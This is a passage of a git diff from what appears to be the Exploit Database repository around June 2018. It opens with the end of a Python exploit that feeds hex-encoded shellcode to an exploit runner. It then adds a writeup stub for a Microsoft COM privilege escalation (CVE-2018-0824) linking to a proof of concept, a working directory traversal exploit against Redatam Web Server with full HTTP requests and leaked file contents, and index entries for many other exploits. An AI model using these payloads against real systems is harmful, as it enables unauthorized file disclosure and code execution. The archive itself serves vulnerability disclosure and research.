"\x4d\x59\x6f\x59\x45\x75\x6c\x53\x36\x31\x6c\x47\x7a"
"\x6d\x50\x49\x6b\x79\x70\x70\x75\x36\x65\x6f\x4b\x77"
"\x37\x62\x33\x61\x62\x70\x6f\x71\x7a\x45\x50\x61\x43"
"\x6b\x4f\x69\x45\x41\x41"
)
exploit = Exploit(shellcode)
exploit.run()
if __name__ == "__main__":
main()

11
exploits/windows/local/44906.txt Normal file
View file

@ -0,0 +1,11 @@
Writeup: https://codewhitesec.blogspot.com/2018/06/cve-2018-0624.html
In May 2018 Microsoft patched an interesting vulnerability (CVE-2018-0824) which was reported by Nicolas Joly of Microsoft's MSRC:
A remote code execution vulnerability exists in "Microsoft COM for Windows" when it fails to properly handle serialized objects. An attacker who successfully exploited the vulnerability could use a specially crafted file or script to perform actions. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file that is designed to exploit the vulnerability. However, an attacker would have no way to force the user to visit the website. Instead, an attacker would have to convince the user to click a link, typically by way of an enticement in an email or Instant Messenger message, and then convince the user to open the specially crafted file. The security update addresses the vulnerability by correcting how "Microsoft COM for Windows" handles serialized objects.
The keywords "COM" and "serialized" pretty much jumped into my face when the advisory came out. Since I had already spent several months of research time on Microsoft COM last year I decided to look into it. Although the vulnerability can result in remote code execution, I'm only interested in the privilege escalation aspects.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44906.zip

90
exploits/windows/webapps/44905.txt Normal file
View file

@ -0,0 +1,90 @@
# Exploit Title: Redatam Web Server < 7 - Directory Traversal
# Google Dork: inurl: /redbin/rpwebutilities.exe/
# Date: 2018-06-18
# Exploit Author: Berk Dusunur
# Vendor Homepage: http://redatam.org/redatam/en/index.html
# Software Link: https://www.cepal.org/en/topics/redatam/download-redatam
# Version: before V6
# Tested on: Pardus Windows AppServ
# CVE : N/A
# Proof of Concept
# Redatam web server windows server running LFN parameter affected by directory traversal
# Making a wrong request causes directory leak
# Request
GET /redbin/rpwebutilities.exe/text?LFN=blablabla%00.htm&TYPE=TMP HTTP/1.1
Host: 192.168.1.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
# Response
HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Jun 2018 10:04:44 GMT
Server: Apache/2.4.23 (Win32) PHP/5.6.25
Content:
Content-Length: 416
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<heading/>
<body>
<h1>R+SP WebUtilities Exception</h1>
<p>Error Number [401]</p>
<p><b>Error Message</b></p>
<p>File not found in folder [C:\wamp\apps\redatam\redbin\] - [blablabla]
Script directory /wamp/apps/redatam/redbin/
# Request 2
GET
/redbin/rpwebutilities.exe/text?LFN=../../../../../../../../../../../../../../../../wamp/apps/redatam/redbin/prt/webservermain.inl%00.htm&TYPE=TMP
HTTP/1.1
Host: 192.168.1.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
# Response 2
HTTP/1.1 200 OK
Date: Mon, 18 Jun 2018 10:11:44 GMT
Server: Apache/2.4.23 (Win32) PHP/5.6.25
Title:
../../../../../../../../../../../../../../../../wamp/apps/redatam/redbin/prt/webservermain.inl
Content:
Content-Length: 2319
Connection: close
Content-Type: text/html; charset=utf-8
[STRUCTURE]
USERCONTROL=YES
GROUPALIGN=LEFT
SERVERTIMEOUT=1800
HTMLPATH=RpSite\
PORTALTITLE=CELADE/CEPAL, Nações Unidas
PORTALSUBTITLE=Procesamiento En-Línea com REDATAM
//PORTALCENTERIMAGE=/redatam/images/LogoRedatam7_520x390.png
//PORTALBACKGROUNDHEADERIMAGE=
//PORTALBACKGROUNDINDEXIMAGE=
//PORTALBACKGROUNDOUTPUTIMAGE=

12
files_exploits.csv
View file

@ -9775,6 +9775,7 @@ id,file,description,date,author,type,platform,port
44840,exploits/windows_x86/local/44840.py,"10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
44841,exploits/windows_x86/local/44841.py,"10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
44842,exploits/linux/local/44842.txt,"WebKitGTK+ < 2.21.3 - Crash (PoC)",2018-06-05,"Dhiraj Mishra",local,linux,
44899,exploits/linux/local/44899.txt,"Nikto 2.1.6 - CSV Injection",2018-06-18,"Adam Greenhill",local,linux,
41705,exploits/windows_x86/local/41705.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation",2017-03-11,sickness,local,windows_x86,
44852,exploits/android/local/44852.txt,"Ftp Server 1.32 - Credential Disclosure",2018-06-07,ManhNho,local,android,
44858,exploits/windows/local/44858.txt,"TrendMicro OfficeScan XG 11.0 - Change Prevention Bypass",2018-06-08,hyp3rlinx,local,windows,
@ -9782,6 +9783,10 @@ id,file,description,date,author,type,platform,port
44889,exploits/linux/local/44889.rb,"glibc - 'realpath()' Privilege Escalation (Metasploit)",2018-06-13,Metasploit,local,linux,
44892,exploits/windows/local/44892.txt,"RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation",2018-06-13,LiquidWorm,local,windows,
44896,exploits/windows/local/44896.vb,"Soroush IM Desktop app 0.15 - Authentication Bypass",2018-06-15,VortexNeoX64,local,windows,
44900,exploits/windows/local/44900.txt,"Pale Moon Browser < 27.9.3 - Use After Free (PoC)",2018-06-18,"Berk Cem Göksel",local,windows,
44903,exploits/windows/local/44903.py,"Audiograbber 1.83 - Local Buffer Overflow (SEH)",2018-06-18,"Dennis 'dhn' Herrmann",local,windows,
44904,exploits/linux/local/44904.py,"Redis-cli < 5.0 - Buffer Overflow (PoC)",2018-06-18,"Fakhri Zulkifli",local,linux,
44906,exploits/windows/local/44906.txt,"Microsoft COM for Windows - Privilege Escalation",2018-06-18,"Code White",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39527,8 +39532,6 @@ id,file,description,date,author,type,platform,port
44837,exploits/php/webapps/44837.py,"Pagekit < 1.0.13 - Cross-Site Scripting Code Generator",2018-06-05,DEEPIN2,webapps,php,
44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware,
44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux,
44844,exploits/hardware/webapps/44844.txt,"Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware,
44845,exploits/hardware/webapps/44845.txt,"Canon MF210/MF220 - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware,
44851,exploits/php/webapps/44851.txt,"WampServer 3.0.6 - Cross-Site Request Forgery",2018-06-07,L0RD,webapps,php,
44853,exploits/php/webapps/44853.txt,"WordPress Form Maker Plugin 1.12.24 - SQL Injection",2018-06-07,defensecode,webapps,php,
44854,exploits/php/webapps/44854.txt,"WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection",2018-06-07,defensecode,webapps,php,
@ -39550,10 +39553,11 @@ id,file,description,date,author,type,platform,port
44882,exploits/php/webapps/44882.txt,"Canon PrintMe EFI - Cross-Site Scripting",2018-06-12,"Huy Kha",webapps,php,
44883,exploits/php/webapps/44883.txt,"WordPress Google Map Plugin < 4.0.4 - SQL Injection",2018-06-12,defensecode,webapps,php,
44884,exploits/php/webapps/44884.txt,"WordPress Ultimate Form Builder Lite Plugin < 1.3.7 - SQL Injection",2018-06-12,defensecode,webapps,php,
44885,exploits/hardware/webapps/44885.txt,"Canon LBP7110Cw - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware,
44886,exploits/hardware/webapps/44886.txt,"Canon LBP6030w - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware,
44887,exploits/php/webapps/44887.html,"MACCMS 10 - Cross-Site Request Forgery (Add User)",2018-06-13,bay0net,webapps,php,
44891,exploits/php/webapps/44891.txt,"Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload",2018-06-13,h0n1gsp3cht,webapps,php,
44893,exploits/php/webapps/44893.php,"Joomla Component Ek rishta 2.10 - SQL Injection",2018-06-14,"Guilherme Assmann",webapps,php,
44895,exploits/php/webapps/44895.txt,"OEcms 3.1 - Cross-Site Scripting",2018-06-15,Renzi,webapps,php,
44897,exploits/php/webapps/44897.txt,"Dimofinf CMS 3.0.0 - Cross-Site Scripting",2018-06-15,Renzi,webapps,php,
44901,exploits/php/webapps/44901.html,"Joomla! Component jomres 9.11.2 - Cross-Site Request Forgery",2018-06-18,L0RD,webapps,php,
44902,exploits/linux/webapps/44902.txt,"RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery",2018-06-18,"Dolev Farhi",webapps,linux,
44905,exploits/windows/webapps/44905.txt,"Redatam Web Server < 7 - Directory Traversal",2018-06-18,"Berk Dusunur",webapps,windows,

Can't render this file because it is too large.